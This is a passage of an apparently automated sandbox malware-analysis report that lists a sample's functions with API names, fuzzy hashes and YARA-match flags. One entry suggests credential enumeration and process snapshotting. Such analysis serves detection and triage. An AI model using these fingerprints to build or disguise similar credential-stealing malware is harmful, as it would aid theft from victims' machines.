                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CurrentProfile
                                                                                                                                                                  • String ID: Unknown
                                                                                                                                                                  • API String ID: 2104809126-1654365787
                                                                                                                                                                  • Opcode ID: 327d7d51cf89ce8cae5e34d504ec04f85fc3bceab43135c4ad84e114b6f625fa
                                                                                                                                                                  • Instruction ID: 2f315b40c99fb652a34f7a4964be354fe565a65c4a439cc05d4d6569dac50adf
                                                                                                                                                                  • Opcode Fuzzy Hash: 327d7d51cf89ce8cae5e34d504ec04f85fc3bceab43135c4ad84e114b6f625fa
                                                                                                                                                                  • Instruction Fuzzy Hash: 7731923362CBC087E7108F24E5943DEA760F7A9788F545215EBC952A4ADF7CC695CB00
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Concurrency::cancel_current_task
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 118556049-0
                                                                                                                                                                  • Opcode ID: cd13d64996e07c1042458ffda2b362979b596a5915bd2266bc88f273be9fb08e
                                                                                                                                                                  • Instruction ID: fded685b15247e6908bfbfeff5c5d9c158744da321925fb3c4c0bc648028b8ff
                                                                                                                                                                  • Opcode Fuzzy Hash: cd13d64996e07c1042458ffda2b362979b596a5915bd2266bc88f273be9fb08e
                                                                                                                                                                  • Instruction Fuzzy Hash: 4851497234D74485EE20AF11A58C7DD63D1E724BECF5896219E6D8BBD6DE78CA818300
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193923982.00007FF7AA101000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF7AA100000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.2193868965.00007FF7AA100000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2193964607.00007FF7AA138000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2193964607.00007FF7AA376000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2194109603.00007FF7AA380000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2194152325.00007FF7AA383000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff7aa100000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 73155330-0
                                                                                                                                                                  • Opcode ID: 17d78b6c5c56375eb874d41d2a80c4d6dc6448b3f7763c03c887009f28ab597e
                                                                                                                                                                  • Instruction ID: d476f84f8f0944b58e943cac01e3caf7ac37769045bbcfded9838c68367f1c74
                                                                                                                                                                  • Opcode Fuzzy Hash: 17d78b6c5c56375eb874d41d2a80c4d6dc6448b3f7763c03c887009f28ab597e
                                                                                                                                                                  • Instruction Fuzzy Hash: 4541E422B0A646E5FE26AB16F4043A9F261AB04FD4FA94671DF5D07BE6DE3CD0438310
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FolderFreeKnownPathTask
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 969438705-0
                                                                                                                                                                  • Opcode ID: 868d4f578cba96401b1f6495479bbacf15c691ac0420995af8e675fea13bde39
                                                                                                                                                                  • Instruction ID: 4868f789c1f0fac2e9ff75dbad5de045559145c68879d2207156f3ba56dfa324
                                                                                                                                                                  • Opcode Fuzzy Hash: 868d4f578cba96401b1f6495479bbacf15c691ac0420995af8e675fea13bde39
                                                                                                                                                                  • Instruction Fuzzy Hash: F031967291878081E720CF25E49439EB761F7997E8F505315FAAC43A95DF7CC681CB00
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                  • Opcode ID: cb30a7c2c620b97f400ef9b33bc0fdb0214d80daa24a11497eeb67f4fc095207
                                                                                                                                                                  • Instruction ID: 3ba1bc19efc4254b1e51f4bbe514cc4d7869520cd70a6609ef7a7c86aec9eb25
                                                                                                                                                                  • Opcode Fuzzy Hash: cb30a7c2c620b97f400ef9b33bc0fdb0214d80daa24a11497eeb67f4fc095207
                                                                                                                                                                  • Instruction Fuzzy Hash: DC31913A21DA4482EAA4DF54E8D93ED3361E7B4B88F980521E65DC73D2EE78CB00C711
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseOpen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 47109696-0
                                                                                                                                                                  • Opcode ID: f079ec761da95b766b8b6afbeec7fda29d97571b2deafd3f5d4343d11bd09f0c
                                                                                                                                                                  • Instruction ID: bad6cf855b4df8a7be83f77d3d2803f47720b0cf8976b037bc3ee705a2408ee8
                                                                                                                                                                  • Opcode Fuzzy Hash: f079ec761da95b766b8b6afbeec7fda29d97571b2deafd3f5d4343d11bd09f0c
                                                                                                                                                                  • Instruction Fuzzy Hash: A921D631719A9045FA509B21F8D83EFA760EBA4BD8F545121EE4D83B96DF28CA85C700
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseCreateCredEnumerateFirstHandleMutexProcess32ReleaseSnapshotToolhelp32recv
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 420082584-0
                                                                                                                                                                  • Opcode ID: c9ab736b4f6c492079d64c8d6f82b8cde20559c7846c7308bea0463702db3c69
                                                                                                                                                                  • Instruction ID: 4d6306f03c36e56357c66d923202510749ddf7dfcbf1c8c49fbaac85a755d38a
                                                                                                                                                                  • Opcode Fuzzy Hash: c9ab736b4f6c492079d64c8d6f82b8cde20559c7846c7308bea0463702db3c69
                                                                                                                                                                  • Instruction Fuzzy Hash: 1421D07160C58041FA2077B5E4EE7EE2741AFB579CF641E15E999C15C39E28CF88C621
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseHandleMutexReleaserecv
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2659716615-0
                                                                                                                                                                  • Opcode ID: 3ef56d8363dff6c7d90b20fe7fbf91973a5fd16913c8a728d76967900788aa92
                                                                                                                                                                  • Instruction ID: 570bccf8d78a1c260ae33ea6b162694074f93550d472728fe48ac4f9f5026446
                                                                                                                                                                  • Opcode Fuzzy Hash: 3ef56d8363dff6c7d90b20fe7fbf91973a5fd16913c8a728d76967900788aa92
                                                                                                                                                                  • Instruction Fuzzy Hash: 4911027160C28041FA207775E4EE7EE2741ABA579CF541E15EA9DC15D3DE28CEC88600
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFileLastPointer
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2976181284-0
                                                                                                                                                                  • Opcode ID: 7e9ab1c6d8c64915d6648e9c143c2363700413bfa3c055332623f50353a46816
                                                                                                                                                                  • Instruction ID: 0d29429170d0d1af2a6f8bd57b5405f0cb68d6805bad46d917bf60903d0f9af9
                                                                                                                                                                  • Opcode Fuzzy Hash: 7e9ab1c6d8c64915d6648e9c143c2363700413bfa3c055332623f50353a46816
                                                                                                                                                                  • Instruction Fuzzy Hash: 5A11C176208B9081DB208B25E8882DDB361E399BF8F584711EE798B7D9DE78C6508B00
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193923982.00007FF7AA101000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF7AA100000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.2193868965.00007FF7AA100000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2193964607.00007FF7AA138000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2193964607.00007FF7AA376000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2194109603.00007FF7AA380000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2194152325.00007FF7AA383000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff7aa100000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1173176844-0
                                                                                                                                                                  • Opcode ID: a18cefe2d12551028f3056aac5d6e62e4fbca414a85a138043c9f28a0b70d310
                                                                                                                                                                  • Instruction ID: 50c734481cfd4b45b0ceacb029538377bfabe501fb77ce004753f7e5a719319a
                                                                                                                                                                  • Opcode Fuzzy Hash: a18cefe2d12551028f3056aac5d6e62e4fbca414a85a138043c9f28a0b70d310
                                                                                                                                                                  • Instruction Fuzzy Hash: 9AE01A40E1B107E5F92B33A1F41607580600F087B0DAA17B0DA3E091F3AD1CE04B4330
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1173176844-0
                                                                                                                                                                  • Opcode ID: 267b89f17236609d1417f10d46edbd95984192d968a560c5371d581f7ac22313
                                                                                                                                                                  • Instruction ID: 2938ce360e92497f2d0de620463a1fdb4ebe7208f5cbfdaff9e9595af7adca77
                                                                                                                                                                  • Opcode Fuzzy Hash: 267b89f17236609d1417f10d46edbd95984192d968a560c5371d581f7ac22313
                                                                                                                                                                  • Instruction Fuzzy Hash: EAE0E2B962A25945F9686772188E2ED03404B79378EA81B2669F6892C3AD24CFD18A50
                                                                                                                                                                  APIs
                                                                                                                                                                  • RtlFreeHeap.NTDLL(?,?,00000000,00007FF7AA120C21,?,?,000095D61E68ED83,00007FF7AA12066D,?,?,?,?,00007FF7AA12C66A,?,?,00000000), ref: 00007FF7AA12056A
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00000000,00007FF7AA120C21,?,?,000095D61E68ED83,00007FF7AA12066D,?,?,?,?,00007FF7AA12C66A,?,?,00000000), ref: 00007FF7AA120574
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193923982.00007FF7AA101000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF7AA100000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.2193868965.00007FF7AA100000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2193964607.00007FF7AA138000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2193964607.00007FF7AA376000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2194109603.00007FF7AA380000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2194152325.00007FF7AA383000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff7aa100000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFreeHeapLast
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 485612231-0
                                                                                                                                                                  • Opcode ID: 43a509883ac49e6a5de9370612de203f62b5326ede6e7c11b2a257d050534144
                                                                                                                                                                  • Instruction ID: 85c834572165ec9281fb3c9d48179bb272c645cb688749a9b0af58b8f3edb631
                                                                                                                                                                  • Opcode Fuzzy Hash: 43a509883ac49e6a5de9370612de203f62b5326ede6e7c11b2a257d050534144
                                                                                                                                                                  • Instruction Fuzzy Hash: 95E04F54E0B602D6FF8A7BB1E84403492709F88700F8646B4CD0D47271FD2CA98B4370
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFreeHeapLast
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 485612231-0
                                                                                                                                                                  • Opcode ID: 47cbcda289b4926f8a5fa232dbc04e0ffd722977d505590b0caac84d58b1b127
                                                                                                                                                                  • Instruction ID: eb6b694eeac2837ed210cd55cacf6b81e65c6d173022ad270e8eb5eca105559e
                                                                                                                                                                  • Opcode Fuzzy Hash: 47cbcda289b4926f8a5fa232dbc04e0ffd722977d505590b0caac84d58b1b127
                                                                                                                                                                  • Instruction Fuzzy Hash: 17E01271B1960582FF1867F298ED7FD03955B74748F4848309925C2693ED284F944600
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Concurrency::cancel_current_task
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 118556049-0
                                                                                                                                                                  • Opcode ID: 9a80dbe2cf8185b4106f70475528734e2b7bda874bdd1f042bc6e19ee081fabd
                                                                                                                                                                  • Instruction ID: 69bfbb7dfda2035286cf0143d5fa37ed71f4f73a2c2e696cd911742a85f5d36d
                                                                                                                                                                  • Opcode Fuzzy Hash: 9a80dbe2cf8185b4106f70475528734e2b7bda874bdd1f042bc6e19ee081fabd
                                                                                                                                                                  • Instruction Fuzzy Hash: C161CD7A308A8486EB249F16D5983AD27A1E328FDCF548511CE9D877D9DF39CE86C301
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __std_fs_directory_iterator_open
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4007087469-0
                                                                                                                                                                  • Opcode ID: 7605550896c13ce2b0044ffa57e28911a6a71c870334de07b553f70fc91c1fb8
                                                                                                                                                                  • Instruction ID: 1ec054d29474e8134f01d972e682b502a97f7b3cd4a67250dfdb5e864a8d63cb
                                                                                                                                                                  • Opcode Fuzzy Hash: 7605550896c13ce2b0044ffa57e28911a6a71c870334de07b553f70fc91c1fb8
                                                                                                                                                                  • Instruction Fuzzy Hash: D261C072B08A4095FB10DB79D4D83EC27A1EB697ACF414611EE2997AD5EE34CE85C301
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Concurrency::cancel_current_task
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 118556049-0
                                                                                                                                                                  • Opcode ID: a5deb77f8f49f9fedeb0e81e477f6aecdbfddfee5e5019fdefda3dec8a93b764
                                                                                                                                                                  • Instruction ID: 2f27332aa076e15b705105ad46fb927fcadbd2a6121d47175a5f37cacce38ddc
                                                                                                                                                                  • Opcode Fuzzy Hash: a5deb77f8f49f9fedeb0e81e477f6aecdbfddfee5e5019fdefda3dec8a93b764
                                                                                                                                                                  • Instruction Fuzzy Hash: 7241F372309A9481EE14DB56E4982AEA764F355BFCF508725AF7D87BC5CF38CA918300
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Concurrency::cancel_current_task
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 118556049-0
                                                                                                                                                                  • Opcode ID: c6b69c12cd36f7875a17a812ce72b3a3f18578e6ec5307d39414dff5a0816715
                                                                                                                                                                  • Instruction ID: 883c20d0e33965dcf8befab4a3786186e383530de32000065dc8c50fcdca550d
                                                                                                                                                                  • Opcode Fuzzy Hash: c6b69c12cd36f7875a17a812ce72b3a3f18578e6ec5307d39414dff5a0816715
                                                                                                                                                                  • Instruction Fuzzy Hash: 3541C176308B8481EE109F11E49C7DD67A1F728BD8F545621DFAD8BB96DE38CA81C304
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Concurrency::cancel_current_task
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 118556049-0
                                                                                                                                                                  • Opcode ID: 853d81dcd01675590d0724083e153ef49e9da5bea3df268257120bce8f5fd272
                                                                                                                                                                  • Instruction ID: 3da4783d7b0c1db83407417725db92a57139a5d60e8091dc5a9e95e25508efb9
                                                                                                                                                                  • Opcode Fuzzy Hash: 853d81dcd01675590d0724083e153ef49e9da5bea3df268257120bce8f5fd272
                                                                                                                                                                  • Instruction Fuzzy Hash: FE41D675308B4485EE10DB26A58CBDDA791F728BDCF5496219F6D8B7D6DE38CA81C300
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Concurrency::cancel_current_task
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 118556049-0
                                                                                                                                                                  • Opcode ID: e6c13f35aa4ac436c903e8330d3d0fd07802d9fe13886a5a7148390616572426
                                                                                                                                                                  • Instruction ID: 462982c60402cd5efd5523a90fee4a5ef0b733e83fd8dcfff61561d259e5a488
                                                                                                                                                                  • Opcode Fuzzy Hash: e6c13f35aa4ac436c903e8330d3d0fd07802d9fe13886a5a7148390616572426
                                                                                                                                                                  • Instruction Fuzzy Hash: 2F31247270974484FE149F55A9883EC17419725FECF5882218E2D87BD6EE38CAD1E300
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                  • Opcode ID: f1929d788aef536cbe8cf6883a7401ff42454cfe712c6df48b8c1514241a1e94
                                                                                                                                                                  • Instruction ID: 407f28acda6d5ff1d0e82b95eee0bd6d22999d4974c02059037ea22ac7431499
                                                                                                                                                                  • Opcode Fuzzy Hash: f1929d788aef536cbe8cf6883a7401ff42454cfe712c6df48b8c1514241a1e94
                                                                                                                                                                  • Instruction Fuzzy Hash: 3341D33221820487EB348B29E5D83ED73A0F765B88F145A01EAB6C37D5CF28CE42CB51
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Concurrency::cancel_current_task
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 118556049-0
                                                                                                                                                                  • Opcode ID: 4623c8ffe55977e51d5aa935d574e6ded8e8f440b7e01007c9f18fe25218532f
                                                                                                                                                                  • Instruction ID: 8cbc748d9993d012da009257b25a1efdda265a5bc56e31d1e792a98444fbdf3a
                                                                                                                                                                  • Opcode Fuzzy Hash: 4623c8ffe55977e51d5aa935d574e6ded8e8f440b7e01007c9f18fe25218532f
                                                                                                                                                                  • Instruction Fuzzy Hash: ED31687134978485EE10DF22A5CC7CD6391EB24BDCF5896219E6D8BBD6DE38CA82C304
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InformationVolume
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2039140958-0
                                                                                                                                                                  • Opcode ID: f724cf4dfdbf2b309ca551f6f28598b28e3755897c521442b8a3b2493d716e12
                                                                                                                                                                  • Instruction ID: 9b8cb56e3025776b81aab3a14f841c73541d0b67000d8b6a822ede4a83fd10da
                                                                                                                                                                  • Opcode Fuzzy Hash: f724cf4dfdbf2b309ca551f6f28598b28e3755897c521442b8a3b2493d716e12
                                                                                                                                                                  • Instruction Fuzzy Hash: B8519F32A18B8486EB20CF68E4843DD7764F7A9788F505211EB8C93A99DF78CA84C740
                                                                                                                                                                  APIs
                                                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00000218BFB8FF58
                                                                                                                                                                    • Part of subcall function 00000218BFB7B7B0: __std_exception_copy.LIBVCRUNTIME ref: 00000218BFB7B7F8
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Concurrency::cancel_current_task__std_exception_copy
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 317858897-0
                                                                                                                                                                  • Opcode ID: a7e6f0fecb0498cffed6e7ec906e42701559e28d47d0028a6a716f004b9b2690
                                                                                                                                                                  • Instruction ID: e0ded80b20dadbdb13aee6b46adca5a34658e8571149516b8b523e9022866835
                                                                                                                                                                  • Opcode Fuzzy Hash: a7e6f0fecb0498cffed6e7ec906e42701559e28d47d0028a6a716f004b9b2690
                                                                                                                                                                  • Instruction Fuzzy Hash: 3021F972609B4441EE14EB15A1843EC6390E7A4BA8F2447219A7C87BD7EE74CAD2C340
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                  • Opcode ID: 90e282629e3327800b1a09ea2473f0e2941ce1167cc6a0942764be9094e0e12c
                                                                                                                                                                  • Instruction ID: 65ed39e08b54b241decd5c0f9e7e481aeef0d5878fd5ad6e8488da71312e44b2
                                                                                                                                                                  • Opcode Fuzzy Hash: 90e282629e3327800b1a09ea2473f0e2941ce1167cc6a0942764be9094e0e12c
                                                                                                                                                                  • Instruction Fuzzy Hash: DC31AF7221C650C2FB556F65C8C93ED27A0A768B9CF450A16AE39833D3DFB8CE458B11
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
